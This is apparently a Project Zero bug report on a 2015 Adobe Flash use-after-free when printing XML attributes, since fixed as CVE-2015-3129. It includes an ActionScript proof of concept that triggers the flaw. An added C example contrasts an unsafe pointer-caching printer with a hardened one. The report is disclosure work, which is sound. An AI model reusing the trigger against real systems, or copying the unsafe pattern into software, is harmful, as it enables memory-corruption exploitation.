Status: Fixed
Closed: Jul 2015
Adobe Flash: Use-after-free when printing XML Attributes
Project Member Reported by natashenka@google.com, May 5 2015
If an XML attribute is set to an object that has toString defined, it can lead to a use-after-free condition if the toString function adds many attributes to the XML object while it is being printed. This happens because adding extra attributes eventually causes the buffer that contains the object variables to be reallocated. 

A minimal proof of concept is as follows:

var doc:XML = new XML("<mytag name='Val'> item </mytag>");
trace(doc.firstChild.attributes.name); // Val
trace(doc.firstChild); // <mytag order="first" name="Val"> item </mytag>

var n = {toString : s, valueOf : s};

for (attr in doc.firstChild.attributes) {
    trace(attr + " = " + doc.firstChild.attributes[attr]);
}

var q = doc.firstChild.attributes;
for (var i = 0; i < 100; i++) {
    q[i] = "t"; // Make the var buffer big, so it doesn't immediately get reallocated as a simple object (which zeros its values)
}
trace(doc.toString());
doc.firstChild.attributes.natalie = n;
trace(doc.toString());

function s() {
    trace("hello");
    doc.firstChild.attributes.order1 = "a";
    doc.firstChild.attributes.name2 = "a";
    doc.firstChild.attributes.natalie1 = "a";
    doc.firstChild.attributes.order3 = "a1";
    doc.firstChild.attributes.b = "a2";
    doc.firstChild.attributes.order;
    var q = doc.firstChild.attributes;
    for (var i = 0; i < 1000; i++) {
        q[i] = "t";
    }
    return "myString";
}

A sample swf and fla are attached. This PoC only works on 64-bit Linux (probably due to pointer size affecting what gets reallocated in the freed area), but the use-after-free condition should occur on all platforms.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.

Attachments: xmlattribs.fla (4.8 KB), xmlattribs.swf (914 bytes)
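The bug class behind this report, as an added example that is not from the report or from Flash's own code: a C model of an attribute list whose to-string callback can append entries (and so reallocate the buffer) while that list is being enumerated, showing the pointer-caching pattern that goes wrong beside a variant that re-reads the buffer on every step. All names (attr_list, attr_add, print_attrs_unsafe, print_attrs_safe, grow_during_print, demo_safe) and the sample data are hypothetical.

```c
#include <stdio.h>
#include <stdlib.h>
/* A to-string callback may mutate the list being printed, like the PoC's s(). */
struct attr_list; typedef const char *(*to_string_fn)(struct attr_list *owner);
typedef struct { const char *name, *value; to_string_fn conv; } attr;
struct attr_list { attr *items; size_t len, cap, reallocs; };
/* Append one attribute; growing the buffer may move it (the realloc in the report). */
static void attr_add(struct attr_list *l, const char *name, const char *value, to_string_fn conv) {
    if (l->len == l->cap) {
        l->cap = l->cap ? l->cap * 2 : 4;
        l->items = realloc(l->items, l->cap * sizeof *l->items);
        l->reallocs++;
    }
    l->items[l->len++] = (attr){ name, value, conv };
}
/* Bug shape: the item pointer is cached across a callback that can realloc. */
size_t print_attrs_unsafe(struct attr_list *l) {
    attr *cur = l->items; size_t n = l->len; /* cur is stale once conv() grows the list */
    for (size_t i = 0; i < n; i++) {
        const char *v = cur[i].conv ? cur[i].conv(l) : cur[i].value;
        printf("%s=%s\n", cur[i].name, v); /* reads freed memory after a realloc */
    }
    return n;
}
/* Hardened: copy the entry out, then re-read base pointer and length each step. */
size_t print_attrs_safe(struct attr_list *l) {
    size_t printed = 0;
    for (size_t i = 0; i < l->len; i++, printed++) {
        attr a = l->items[i];              /* snapshot before running script code */
        const char *v = a.conv ? a.conv(l) : a.value;
        printf("%s=%s\n", a.name, v);      /* nothing is read via the old buffer */
    }
    return printed;
}
/* Constructed stand-in for s(): appends enough attributes to force reallocation. */
static const char *grow_during_print(struct attr_list *l) {
    for (int i = 0; i < 64; i++) attr_add(l, "t", "t", NULL);
    return "myString";
}
/* Build the PoC-shaped list (constructed data) and print it the safe way. */
size_t demo_safe(struct attr_list *l) {
    attr_add(l, "name", "Val", NULL);
    attr_add(l, "natalie", NULL, grow_during_print);
    return print_attrs_safe(l);            /* print_attrs_unsafe(l) here is the UAF */
}
int main(void) {
    struct attr_list l = {0};
    printf("printed %zu attributes\n", demo_safe(&l));
    free(l.items); return 0;
}
```

Running the unsafe variant under AddressSanitizer reports a heap-use-after-free on the read of cur[i].name after the callback, which is the same shape of defect the report describes for the XML object's variable buffer.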
Project Member Comment 1 by natashenka@google.com, May 6 2015
This is PSIRT-3656
Comment 2 by cevans@google.com, Jul 5 2015
Labels: CVE-2015-3129
Comment 3 by cevans@google.com, Jul 9 2015
Labels: Fixed-2015-Jul-8
Status: Fixed
Fixed: https://helpx.adobe.com/security/products/flash-player/apsb15-16.html
Project Member Comment 4 by natashenka@google.com, Aug 3 2015
Labels: -Restrict-View-Commit